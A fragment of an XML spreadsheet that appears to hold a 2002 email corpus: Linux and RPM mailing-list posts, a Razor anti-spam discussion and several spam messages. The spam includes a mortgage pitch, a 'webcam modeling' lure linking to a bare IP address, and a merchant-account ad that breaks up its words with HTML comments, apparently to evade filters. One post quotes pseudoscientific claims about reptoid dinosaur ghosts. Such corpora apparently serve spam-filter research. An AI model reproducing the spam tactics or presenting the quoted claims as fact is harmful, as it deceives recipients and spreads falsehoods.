 online.com/Click?q=3D64-UBOhIuLfXFWdMQZNGWF8w6YrPhsR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D79-rsQHIEB=
 fv1GXX4XmFz_e0CvgpaFR"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NL=3De501-01&amp;ISSUE=3D2002-07-11" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D8e-V=
 e8c-wniKTXbI4M0kFSLkVftLRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias said:
 &gt;Could you post the list of files in question?
 Sure. I used the following command to rebuild the package:
 rpmbuild --rebuild --target i586 lame-3.92-fr5.src.rpm
 And here is the error output for the files:
 RPM build errors:
     user dude does not exist - using root
     user dude does not exist - using root
     Installed (but unpackaged) file(s) found:
    /usr/share/doc/lame/html/basic.html
    /usr/share/doc/lame/html/contributors.html
    /usr/share/doc/lame/html/examples.html
    /usr/share/doc/lame/html/history.html
    /usr/share/doc/lame/html/id3.html
    /usr/share/doc/lame/html/index.html
    /usr/share/doc/lame/html/lame.css
    /usr/share/doc/lame/html/modes.html
    /usr/share/doc/lame/html/node6.html
    /usr/share/doc/lame/html/switchs.html
 Coy
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sun donates elliptic curve code to OpenSSL? (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">---------- Forwarded message ----------
 Date: 19 Sep 2002 22:18:46 -0400
 From: Perry E. Metzger &lt;perry@piermont.com&gt;
 To: cryptography@wasabisystems.com
 Subject: Sun donates elliptic curve code to OpenSSL?
 According to this:
 http://www.sun.com/smi/Press/sunflash/2002-09/sunflash.20020919.8.html
 Sun is donating some elliptic curve code to the OpenSSL project. Does
 anyone know details that they would care to share on the nature of the
 donation?
 -- 
 Perry E. Metzger		perry@piermont.com
 ---------------------------------------------------------------------
 The Cryptography Mailing List
 Unsubscribe by sending "unsubscribe cryptography" to majordomo@wasabisystems.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt.conf suggestion
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 how about applying this to the default apt.conf shipped with the
 freshrpms.net apt package?  I found it a bit weird when the behaviour
 changed between the old 0.3.x and the new 0.5.x versions so that when
 doing a "apt-get upgrade", it wouldn't tell me *which* packages were to
 be upgraded, just that it was about to upgrade something...
 --- apt.conf	2002-09-27 14:58:28.000000000 +0300
 +++ apt.conf	2002-10-03 21:38:05.000000000 +0300
 @@ -4,6 +4,7 @@
    Get 
    {
       Download-Only "false";
 +     Show-Upgraded "true";
    };
  };
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Neat stuff. Seems to combine elements of Scientology/Xenu and
 David Icke (http://www.davidicke.com/icke/temp/reptconn.html).
 - Gordon
 ----- Original Message ----- 
 From: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 To: &lt;fork@example.com&gt;
 Sent: Monday, September 30, 2002 10:11 PM
 Subject: Dinosaurs Eggs and the Origins of Good and Evil
 &gt; One of the most bizarre pages I've seen on the Web. At first I thought it
 &gt; might be some sort of back-story to a RPG, but, nope, it looks like somebody
 &gt; believes this.
 &gt; 
 &gt; ===
 &gt; http://www.viking-z.org/r20i.htm
 &gt; 
 &gt; M09. Dinosaurs Eggs and the Origins of Good and Evil.
 &gt; DINOSAURS. Reptoid ETs are reported to be 12 foot high crocodiles walking on
 &gt; their hind legs. This is a description of a dinosaur. It now appears in
 &gt; Remote Viewing that the Reptoid ETs, dinosaurs and dragons are all linked
 &gt; together and that they all originated on Earth. The Erideans who are Reptoid
 &gt; derivatives have a home planet (in the Eridanus system) like all other ETs.
 &gt; The Reptoids have no reported home planet. They also come over as entities
 &gt; with little brain who control their bodies directly by spirit. This is a
 &gt; description of a ghost or disincarnate entity regardless of how people see
 &gt; them. Thus it could be that the Reptoids, Erideans, Nordics, Anunnaki, but
 &gt; not the Greys, all have origins on Earth and have a strong link to Earth
 &gt; even if they choose to live elsewhere. The Greys do not appear to have a
 &gt; renal or urinary system and this points to them not originating on Earth.
 &gt; The definitive work on dragons is "The Flight of Dragons" by Peter
 &gt; Dickinson. If dragons did exist in the flesh, they did not survive the long
 &gt; bow. Targets do not come much bigger.
 &gt; 
 &gt; Truth is stranger than fiction. Thus the writer's current scenario is that
 &gt; there were a race of dinosaurs which developed psychic intelligence to guard
 &gt; their eggs and young, and who probably preferred to live underground. They
 &gt; survived the wipe out of the dinosaurs 50 million years ago with difficulty.
 &gt; They evolved into the Erideans and transferred to a more hospitable planet
 &gt; (for them) possibly with the help of another race of ETs who wanted slaves
 &gt; but otherwise had no interest in Earth or mind control.
 &gt; 
 &gt; Thus it appears that the current Reptoids are the Spirits or ghosts of the
 &gt; dinosaurs. They must have been powerful to survive 50 million years and also
 &gt; to appear to some people. They have appeared to the writer in remote
 &gt; viewing. They are living on as vampire entities. Such immortal minds are
 &gt; contagious and can easily jump race and species barriers. If they can be
 &gt; encouraged to reincarnate, then the power sources of the black magicians and
 &gt; mind controllers will disappear. Encouraging them to reincarnate will help
 &gt; so called immortal minds to disappear as immortal minds have great
 &gt; difficulty surviving reincarnation. Purging people's dinosaurs should remove
 &gt; all perverse psychic abilities not under their control. They are a source of
 &gt; Satanic Guardian Angels and demons. They control us by owning our psi. Thus
 &gt; if we regain ownership of psi, we must relinquish their control and that of
 &gt; all other mind controllers. Encourage people to regain ownership of their
 &gt; psi.
 &gt; 
 &gt; THE ORIGINS OF LOVE, HATE AND PURE MALICE. The following scenario appears to
 &gt; hold water and can account for the origins of our Universal Subconscious.
 &gt; 
 &gt; Dinosaurs laid their eggs and buried them either underground or in piles of
 &gt; rotting vegetation (a good source of beetles and grubs for young
 &gt; hatchelings). They did not sit on their eggs to keep them warm, which made
 &gt; them very vulnerable to drastic climate and temperature change. In order to
 &gt; keep away predators some at least developed psychic mind control. To do this
 &gt; they had to capture ownership of the psi of potential predators. This is an
 &gt; act of hatred and outward looking. While a few dinosaurs did develop the
 &gt; ability to bear living young, most did not. The dinosaurs got in first and
 &gt; so their mind control tends to override all other latter minds. They have
 &gt; become the source of all Satans, devils and demons.
 &gt; 
 &gt; Birds on the other hand developed the ability to sit on their eggs and keep
 &gt; them warm. A hen bird normally lays a series of eggs (say one per day) and
 &gt; only starts sitting when the clutch is completely laid. Thus all eggs tend
 &gt; to hatch together as they all have an equal period of warmth. This is
 &gt; primarily an act of love but inward looking. Bearing live young is not
 &gt; suitable to a bird of the air. A pregnant pigeon would not fly very far.
 &gt; Antarctic penguins tuck a single egg between their legs to keep it warm,
 &gt; even if they are standing on ice.
 &gt; 
 &gt; Mammals developed live bearing of their young which is also primarily an act
 &gt; of love and inward looking. This is especially true as a mammalian female
 &gt; can not desert her young in the womb in case of emergency as can a bird
 &gt; sitting on a nest.
 &gt; 
 &gt; Dinosaurs developed hate and mind control of others to protect their young,
 &gt; while birds and mammals developed love. Birds and mammals certainly do hate
 &gt; all enemies of their young, but this is secondary.
 &gt; 
 &gt; If one wants to purge the sources of malice of say a black magician, then
 &gt; purge his dinosaurs and his dinosaur eggs. Unfortunately most of our
 &gt; religions are based on dinosaur protection of eggs and thus mind control,
 &gt; regardless of the front they put out to the public. Religion tends to
 &gt; concentrate on "How to Brainwash your Neighbour". Conscious thought has
 &gt; built many mighty empires, theologies and slave control systems out of using
 &gt; "How to care for and protect one's young" as a foundation.
 &gt; 
 &gt; Thus the foulest form of abuse possible is to call something "A load of
 &gt; dinosaur's eggs". Purging the dinosaurs and dinosaur's eggs of any entity
 &gt; tends to purge all malice back to its roots.
 &gt; 
 &gt; It looks as if mighty immortal minds have built up from small beginnings,
 &gt; aided and abetted by various occultists and other. As they will insist on
 &gt; vampiring the living for energy to avoid reincarnation and disturbing the
 &gt; serenity of the writer, he encourages them to reincarnate.
 &gt; 
 &gt; ITEMS FOR INSPECTION. For mind control to take place, then someone must take
 &gt; control or ownership of the target's psi and pleasure centres. Check for the
 &gt; following.
 &gt; 
 &gt; Nest of dinosaur's eggs, holy dinosaurs, etc.
 &gt; Eggs, controllers or owners in peoples psi, pleasure centres, pain killing
 &gt; hormones, abilities, etc.
 &gt; Mind machines.
 &gt; The original engraving or engram.
 &gt; GOD and SATAN appear to be job titles and not entities in their own right. T
 &gt; hey appear to be dinosaur engravings or engrams. No doubt dinosaurs were the
 &gt; first job holders.
 &gt; TIMETRACKS are worth investigating as our complete history from the start of
 &gt; time.
 &gt; 
 &gt; My, our, Man's timetracks, etc.
 &gt; The time tracks of the Universe, Universal Subconscious, Galactic
 &gt; Subconscious, etc.
 &gt; EXTINCT RACES of ETs can cause problems when they live on in vampire mode.
 &gt; Their virtues may known to channelers but they can also have vices. Whenever
 &gt; one hears of races which have evolved on to higher planes, suspect that the
 &gt; higher plane is a vampire one. One may never know what they looked like or
 &gt; other basic characteristics, which makes linking back a trifle difficult.
 &gt; Every extinct race, etc.
 &gt; BLOOD ANCESTORS are also worth investigating as minds can be passed down via
 &gt; genetic linkages. Some of these can be over 2,000 years old.
 &gt; Every blood ancestor, ancestral mind, genetic mind, etc.
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 +0100 %{!Sat, Aug 10, 2002 at 12:11:50PM +0100}, FRLinux wrote:
 &gt; Hello,
 &gt; 
 &gt; I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
 &gt; standard RPMs for cdrecord and it didn't give any hard locks on it at
 &gt; all, i've already burnt a couple of CDs.
 Thanks for that.  I'd sort of suspected that if it was a widespread
 problem it would have already been fixed.  Starting to look more likely
 it is a mistake/misconfiguration on my part, though I still don't know
 where to look for the mistake/misconfiguration.
 m
 -- 
 Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-08 at 13:10, Padraig Brady wrote:
 &gt; Yikes, hope he's not serious!
 The impression I get from reading lkml the odd time is
 that IDE has gone downhill since Andre Hedrick was 
 effectively removed as maintainer. Martin Dalecki seems
 to have been unable to further development without 
 much breakage. However, this is part of the fun of
 the development kernel. Alan and others are annoyed
 because they can't do any development themselves while
 IDE is broken. Hopefully the 2.4 IDE port should help.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] SUSE 8 disks?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi all,
 I'm looking for the disks for SUSE 8. Does anybody
 have them for a reasonable price?
 I'm available to collect at the time of your
 convenience anywhere in the East/Greater
 Dublin area!
 TIA.
 Paul...
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Why so fast?  Normal terminal velocity is much slower.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; bitbitch@magnesium.net
 &gt; Sent: Sunday, September 08, 2002 8:36 AM
 &gt; To: (Robert Harley)
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: Re: The Big Jump
 &gt; 
 &gt; 
 &gt; 
 &gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt; 
 &gt; Freaking french people...
 &gt;    :-)
 &gt; -BB
 &gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
 in a
 &gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 km
 &gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 reach
 &gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 the
 &gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt; RH&gt; ground and still hasn't opened it.
 &gt; 
 &gt; RH&gt; R
 &gt; 
 &gt; RH&gt; ObQuote:
 &gt; RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 Franza."
 &gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt; RH&gt;   - Pope Julius II, 2 January 1511
 &gt; 
 &gt; 
 &gt; 
 &gt; --
 &gt; Best regards,
 &gt;  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Tabor J. Wells wrote:
 &gt; On Fri, Aug 09, 2002 at 10:05:29AM +1000,
 &gt; Adam Goryachev &lt;mailinglists@websitemanagers.com.au&gt; is thought to have said:
 &gt; 
 &gt; 
 &gt;&gt;&gt;Now I get some opt-in mail which looks to me like
 &gt;&gt;&gt;spam.  I hit "this is spam".  My trust rating plummets --
 &gt;&gt;
 &gt;&gt;Good! Your opinion of what is spam is unreliable, and therefore, I don't
 &gt;&gt;*want* to trust you. IMHO, that is exactly the case that the trust system is
 &gt;&gt;supposed to sort out. People who incorrectly submit non-spam bulk mail to
 &gt;&gt;razor.
 &gt; 
 &gt; 
 &gt; Let's take a look at an example here. Someone on this list signed
 &gt; razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm
 &gt; subscriptions in a piss-poor attempt to mailbomb me. I report all of these
 &gt; mailings to Razor because, guess what, for me this is spam. This and a
 &gt; hundred more traditional spam emails to automated spamtrap addresses get 
 &gt; reported by me daily. I probably have a decent TES value because of all of
 &gt; this.
 &gt; 
 &gt; Now lets say someone else who is also reporting a fair amount of your
 &gt; typical proxy/relayed spam has been reporting these and has built up a
 &gt; decent TES rating because of it. However they subscribed to that same ZDNet
 &gt; list and enjoy getting the mail from it except that they don't like seeing 
 &gt; it tagged as spam by Razor. So they razor-revoke it. 
 &gt; 
 &gt; Who loses in this case? Why? Neither party is inaccurate in their actions
 &gt; IMO. But someone's standing is going to get hurt because of it.
 Actually you would be inaccurate in your action in a way. The correct 
 behavior would be to unsubscribe razor-users@fsckit.net from the mailing 
 list.
 But in any case, you have to understand that you and him would not be 
 the only one involved. As I said in a another thread, you probably get 
 hurt only if you are against the majority of people (which makes sense). 
 If you are with the majority, you get a bonus (which also makes sense). 
 If there is no majority, nobody wins or lose.
 Razor is designed for the betterment of most people, i.e. the majority, 
 not for the individual. If one doesn't agree with the majority, he 
 should use the razor-whitelist or create a blacklist (BTW, why doesn't 
 razor provide a razor-blacklist too?)
 	Jehan
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">----- Original Message -----
 From: "Tim Chapman" &lt;timc@2ubh.com&gt;
 To: "zzzzteana" &lt;zzzzteana@yahoogroups.com&gt;
 Sent: Monday, November 25, 2002 8:53 AM
 Subject: [zzzzteana] An announcement
 &gt; Mr Tim Chapman, freelance gentleman of letters of Halifax, Yorkshire,
 &gt; announces his betrothal to Dr Ro Gault, virtual reality boffin of Cardiff
 &gt; University, Wales. Nuptials to be arranged at later date. No flowers.
 &gt;
 &gt; TimC
 &gt; Bloody hell, she said yes!
 ________________________
 Congratulations Ro &amp; Tim - Here's to your lifelong happiness.
 Here's some advice written by Odgen Nash:
 "To keep love brimming in the loving cup, When you're wrong admit it and
 when you're right shut up!"
 Best wishes
 Ju
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [IIU] Recommendations on phone / pda+phone + European GPRS coverage info.
</t>
  </si>
  <si>
    <t xml:space="preserve">o2 xda?
 Darragh
 -----Original Message-----
 From: iiu-admin@taint.org [mailto:iiu-admin@taint.org]On Behalf Of
 Gearoid Griffin
 Sent: 19 August 2002 14:18
 To: iiu@taint.org
 Subject: Re: [IIU] Recommendations on phone / pda+phone + European GPRS
 coverage info.
 Bernie, you might try the
 Sony - Ericcison T68m? I use it with my Pocket Pc all the time no problems.
 Gearid
 ----- Original Message -----
 From: "Bernard Michael Tyers" &lt;bernard.tyers@dcu.ie&gt;
 To: &lt;iiu@taint.org&gt;; "Open Tech list" &lt;open@webnet.ie&gt;
 Sent: Monday, August 19, 2002 2:12 PM
 Subject: [IIU] Recommendations on phone / pda+phone + European GPRS coverage
 info.
 &gt; Hi everyone,
 &gt; (apologies for the cross list posting)
 &gt;
 &gt; My boss has asked me about the whole phone-pda/pda + phone thingy.
 &gt; They're looking for a phone with following outlined specs:
 &gt;
 &gt; 1. gprs
 &gt; 2. tri-band (states useage also)
 &gt; 3. long battery life
 &gt; 4. irda/bluetooth (but bluetooth is only an add-on..I'm ignoring it)
 &gt; 5. easy to use (phb market :)
 &gt;
 &gt; I had suggested him to maybe look at a pda/phone combo.
 &gt;
 &gt; Can anyone suggest :
 &gt;
 &gt; 1. possible phones with the first set of specs
 &gt; 2. a phone/pda combo with the same specs
 &gt; 3. some information sources (maps, rates, percentages, etc) for gprs
 &gt; coverage europe-wide, and fees for roaming.
 &gt;
 &gt; thanks in advance,
 &gt;
 &gt; rgrds,
 &gt; Bernard
 &gt; --
 &gt; Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
 &gt; E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117
 &gt;
 &gt; _______________________________________________
 &gt; IIU mailing list
 &gt; IIU@iiu.taint.org
 &gt; http://iiu.taint.org/mailman/listinfo/iiu
 &gt;
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tired Of Your High Mortgage Rate - REFINANCE TODAY....
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner, 
 Interest Rates are at their lowest point in 40 years! We help you find the 
 best rate for your situation by matching your needs with hundreds of 
 lenders!
 Home Improvement, Refinance, Second Mortgage, 
 Home Equity Loans, and much, much more!
 You're eligible even with less than perfect credit!
 This service is 100% FREE to home owners and new home buyers 
 without any obligation. 
 Where others say NO, we say YES!!!
 http://www.page4life.org/users/loans4u/
 Take just 2 minutes to complete the following form.
 There is no obligation, all information is kept strictly
 confidential, and you must be at least 18 years of age.  
 Service is available within the United States only.
 This service is fast and free. 
 http://www.page4life.org/users/loans4u/
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To opt out:
 http://www.page4life.org/users/loans4u/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Keillor voices up on what to do with the WTC site
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.phc.mpr.org/posthost/index.shtml
 Dear Garrison,
 There are at least six plans about what to do with
 "Ground Zero" in New York. I believe a suitable memorial
 surrounded by a lovely park with benches, walkways,
 children's playgrounds, possibly some concessions such
 as a restaurant, small theater and a place for art works
 would be the best tribute to those who lost their lives.
 What do you think should done with the space?
 Joe Adams
 Hillsdale, New Jersey
 I dread the thought of a big memorial in Manhattan
 that's designed by committee and that's gone through
 public hearings and so forth ----- it's going to be cold
 and ugly and pretentious and the upshot will be one more
 public space that the public hates, of which there are
 plenty already. New York is a bustling commercial city
 and that's the beauty of it, it's a city of young
 ambitious dreamy people, like the folks who died in the
 towers, and it's not a memorializing city. Historic
 events occurred in New York that in any other city would
 be commemorated with interpretive centers and guides and
 historical museums and in New York there's barely a
 little plaque. That's a great thing, in my estimation.
 It's a hustling city, full of immigrants looking for
 their big chance, and compared to that spirit of
 entrepreneurship, a memorial plaza with a fountain and a
 statue of something seems dead to me. Look at Grant's
 Tomb. Who walks past it and thinks about President
 Grant? Nobody. People sit in the plaza by Grant's Tomb
 and think about lunch, about sex, about money, about all
 the things that New York is about. If you want to find
 Grant, read his memoirs. His monument seems odd in New
 York: it belongs in Washington, which is our memorial
 city. New York is for the young and lively.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: please help, new webcam/ modeling page
</t>
  </si>
  <si>
    <t xml:space="preserve">I just got a webcam and computer for my birthday and I just finished
 my first homepage. I added some of my modeling pictures there so if you
 think you can help my career please let me know. I could also use some
 opinions on how to make my site look better. If you can't help and you know
 someone that can, please forward them this e-mail. I need money and can sure
 use the work. I just added my most recent set of pictures.
 If you don't want to look at my pics,  I am 5'5 125, blonde hair, blue eyes
 and I play volleyball.
 Link to my site: http://63.107.112.67/profiles/julie20
 Thanks,
 Julie
 Oh, if you do not know who I am and I sent this e-mail to you by mistake
 please disregard it. If you would like to make sure to be removed from my
 address book, please click here http://63.107.112.67/optout.html
 and i have a program to make sure I do not send you more mail.Sorry I will
 not ever try talking to you again!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The impression I get from reading lkml the odd time is
 &gt; that IDE has gone downhill since Andre Hedrick was 
 &gt; effectively removed as maintainer. Martin Dalecki seems
 &gt; to have been unable to further development without 
 &gt; much breakage. 
 Hmm... begs the question, why remove Handrick?
 If it ain't broke, don't fix it.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 10 Sep 2002 18:39:07 +0200
 Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Before going, I did repackage the latest hackedbox and lbreakout2 that
 &gt; both came out today.
 &gt; 
 &gt; Have fun! (I will!! ;-))
 fun here too, recompiled gnome 2.02rc2 today ;-)
 Have a nice and good time!
 -- 
 regards
       Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Stripping the SpamAssassin report
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm assuming I need to strip the SpamAssassinReport.txt attachments 
 from my spam mailbox before I run the mailbox through razor-report, 
 correct?  Does anyone know of an easy way to do this?
 Thanks
   Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR      Pittsburg State University
 Network &amp; Systems Manager       Kelce 157Q
 Office of Information Systems   Pittsburg, KS 66762
 Voice: (620) 235-4606           Fax: (620) 235-4545
 http://www.pittstate.edu/ois/
 Warning:  This message has been quadruple Rot13'ed for your protection.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</si>
  <si>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Thanks lads,
 I didn't mean to criticise/give offence or anything (someone mailed me off
 list who seemed to think I did) but I was just wondering "if anything could
 be done" about those messages.
 Maybe it was a stupid question, seeing as I know virtually nothing about
 mailman, listservs, or server side spam filtering, but thanks for answering
 intelligently!
 Ciaran
 Waider elucidated:
 &gt; Martin Feeney wrote:
 &gt; | On Tue, 20 Aug 2002 10:14:59 Ciaran Mac Lochlainn wrote:
 &gt; |
 &gt; |&gt; is it really necessary to send these to the list?
 &gt; |
 &gt; |
 &gt; | What's happening is that the scumbag spammers are forging the from
 &gt; | address to be ilug@linux.ie as well, so the notification to them that
 &gt; | their email is being reviewed gets sent back to the from address:
 &gt; | ilug@linux.ie
 &gt; |
 &gt; | Martin.
 &gt; |
 &gt;
 &gt; Not to belabour the point, but noone can legitimately send mail to ilug
 &gt; from ilug@linux.ie, so Mailman should be catching this and stopping it.
 &gt; Not sending confirms or whatever, just dropping the mail on the floor.
 &gt;
 &gt; Cheers,
 &gt; Waider.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 19 Aug 2002 12:01:02 BST, Adrian Murphy said:
 &gt;
 &gt;I wonder could anyone reccommend a good
 &gt;website monitoring service-with sms alerts.
 &gt;thx and sorry to be OT.
 It sounds more like you're looking for a commercial service, in which
 case "ain't got a bog", but on the offchance that you're looking for
 software, try nagios. (www.nagios.org)
 It'll do that and a lot more.
 -- 
 	Niall
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: --Breaking News from The Evil Gerald--
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0005_01C2291D.98A2ED40
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Actresses with just the one annoying accent! Don't we all just love =
 them? Them and football of course, more of which in the Breaking News =
 section of your friendly neighbourhood Evil Gerald.
 Yours,
 The Evil Gerald=20
 ------=_NextPart_000_0005_01C2291D.98A2ED40
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type&gt;
 &lt;META content=3D"MSHTML 5.00.2919.6307" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Actresses with just the one annoying =
 accent! Don't=20
 we all just love them? Them and football of course, more of which in the =
 &lt;A=20
 href=3D"http://www.evilgerald.com/Breaking_news.htm"&gt;Breaking News&lt;/A&gt; =
 section of=20
 your friendly neighbourhood &lt;A href=3D"http://www.evilgerald.com"&gt;Evil=20
 Gerald&lt;/A&gt;.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Yours,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;The Evil Gerald =
 &lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0005_01C2291D.98A2ED40--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: great rates for bad credit 33161186544333222
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FF0000" size="6"&gt;G&lt;!--mom--&gt;ET YOUR MER&lt;!--aunt susan--&gt;CHANT AC&lt;!11--uncle joeseph--&gt;COUNT
 TOD&lt;!--dads--&gt;AY!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Comic Sans MS" color="#800080"&gt;A&lt;!--mom--&gt;pproved
 in 24 hours&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Comic Sans MS" color="#800080"&gt;B&lt;!--pop--&gt;ad
 C&lt;!--kinder than--&gt;redit/No C&lt;!--granny--&gt;redit - Not a P&lt;!--mom--&gt;roblem&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Comic Sans MS" size="3" color="#0000FF"&gt;VISA *
 MASTERCARD *&lt;/font&gt;&lt;/b&gt;&lt;font size="3" color="#0000FF"&gt; &lt;font face="Comic Sans MS"&gt;&lt;b&gt;AMERICAN
 EXPRESS * &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Comic Sans MS"&gt;DISCOVER * ELECTRONIC CHECK&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Comic Sans MS" size="5"&gt;&lt;a href="http://www.requestedinfo.net/cgi-bin/rbis.cgi?code=bt5bt5"&gt;Click
 here to visit our website.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="4" face="Comic Sans MS"&gt;In just one minute you can complete the request
 form for your merchant account.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font size="6" color="#FF0000"&gt;LOWER YOUR MERCHANT RATES
